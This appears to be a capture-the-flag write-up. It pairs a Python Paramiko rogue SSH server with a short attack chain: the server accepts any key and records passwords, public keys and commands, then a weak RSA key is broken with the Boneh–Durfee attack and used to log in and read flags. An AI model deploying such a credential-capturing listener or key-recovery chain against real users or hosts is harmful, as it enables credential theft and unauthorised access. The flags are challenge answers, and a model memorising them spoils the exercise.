
[+] Create SSH server with mickey user and provide it to the app

[+] Listen to the incoming SSH connection. Retrieve the public key used for authentication and the sent command

echo NDH{a_WInN3r_15_A_Dr3AMeR > ~/flag_1.txt

```
import socket
from paramiko import paramiko
import threading
import sys
import traceback
# Host key for this throwaway listener, loaded from the Paramiko demo files.
# NOTE(review): that demo private key is published with Paramiko, so it gives
# clients no real assurance about who they are talking to. Generate a fresh
# key for anything other than a short-lived lab harness.
host_key = paramiko.RSAKey(filename='test_rsa.key')
# Send Paramiko's own log output to filename.log in the working directory.
paramiko.util.log_to_file("filename.log")
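class Server(paramiko.ServerInterface):
    """Paramiko server policy that records what a connecting client offers.

    This is a capture harness, not an access-control policy: every offered
    public key is accepted, and submitted passwords, key material and the
    requested command are printed to stdout. Treat that output as sensitive
    and never put this class in front of a real service.
    """

    def __init__(self):
        # Set once the client has sent an exec request, so the main thread
        # can tell that the command has been seen.
        self.event = threading.Event()

    def check_channel_request(self, kind, chanid):
        """Allow only 'session' channels; refuse every other channel kind."""
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

    def check_auth_none(self, user):
        """Reject the 'none' authentication method."""
        return paramiko.AUTH_FAILED

    def check_auth_password(self, user, password):
        """Print the submitted credentials, then reject password auth."""
        # The password is printed in clear text on purpose (capture harness).
        print(user, password)
        return paramiko.AUTH_FAILED

    def check_auth_publickey(self, username, key):
        """Print the offered public key and accept it unconditionally.

        No allow-list is consulted: any key the client presents is accepted,
        which is what lets the harness collect the client's public key.
        """
        # Local import keeps this block self-contained; hexlify behaves the
        # same on Python 2 and 3, unlike bytes.encode('hex').
        import binascii

        # NOTE(review): public_numbers is expected on RSA keys; other key
        # types may not have it, so fall back to the base64 public blob
        # instead of raising inside the auth handler.
        numbers = getattr(key, 'public_numbers', None)
        if numbers is not None:
            print(numbers)
        else:
            print(key.get_name() + ' ' + key.get_base64())
        fingerprint = binascii.hexlify(key.get_fingerprint()).decode('ascii')
        print('Auth attempt with key: ' + fingerprint)
        return paramiko.AUTH_SUCCESSFUL

    def get_allowed_auths(self, username):
        """Advertise both password and public-key authentication."""
        return 'password,publickey'

    def check_channel_exec_request(self, channel, command):
        """Print the command the client asked to run and accept the request.

        The command is only printed; nothing in this class executes it.
        """
        print('Command:', command)
        self.event.set()
        return True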
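# Usage: <script> <bind-address> <port>
# NOTE(review): the Server policy accepts any public key, so bind to an
# address that only the intended client can reach and stop the listener as
# soon as the capture is done.
if len(sys.argv) != 3:
    print("usage: %s <bind-address> <port>" % sys.argv[0])
    sys.exit(1)
server = sys.argv[1]
ssh_port = int(sys.argv[2])

sock = None
client = None
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((server, ssh_port))
    sock.listen(100)  # backlog only; a single connection is accepted below
    print("[+] Listening for connection ...")
    client, addr = sock.accept()
except Exception as e:
    print("[-] Listen failed: " + str(e))
    # print_exc() shows the traceback of the caught exception;
    # print_stack() would only show where this handler is running.
    traceback.print_exc()
    if sock is not None:
        sock.close()
    sys.exit(1)
print("[+] Got a connection!")

bhSession = None
try:
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()  # rebinds `server` from the bind address to the policy object
    try:
        bhSession.start_server(server=server)
    except paramiko.SSHException:
        # Without a negotiated transport nothing below can work, so stop
        # here instead of going on to report a successful authentication.
        print("[-] SSH negotiation failed.")
        sys.exit(1)
    # A channel is only handed back once the client has authenticated and
    # opened a session; None means that did not happen within 20 seconds.
    chan = bhSession.accept(20)
    if chan is None:
        print("[-] No channel opened (authentication failed or timed out).")
        sys.exit(1)
    print("[+] Authenticated!")
    # Give the exec request time to reach check_channel_exec_request so the
    # command is printed before the session is torn down.
    server.event.wait(10)
    print(chan.recv(1024))
except Exception as e:
    print("[-] Caught exception: " + str(e))
    sys.exit(1)
finally:
    # Best-effort cleanup on every path, including the sys.exit() calls above.
    for closable in (bhSession, client, sock):
        if closable is None:
            continue
        try:
            closable.close()
        except Exception:
            pass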
```

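[+] Determine the private exponent d with the Boneh–Durfee attack on RSA, using the (e, n) taken from the retrieved public key. The attack only applies when d is small (roughly d < n^0.292), which is the weakness of this key; a key generated with standard parameters is not exposed to it.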
[https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage)

[+] Construct the private key mickey.key (PEM)

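[+] Log in with the reconstructed private key: ssh -i mickey.key <user>@<host> -p 2222 (the user@host value was obfuscated by the page's e-mail protection and is not recoverable here)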

[+] cat flag_2.txt
_Wh0_NeV3R_gIve5_uP}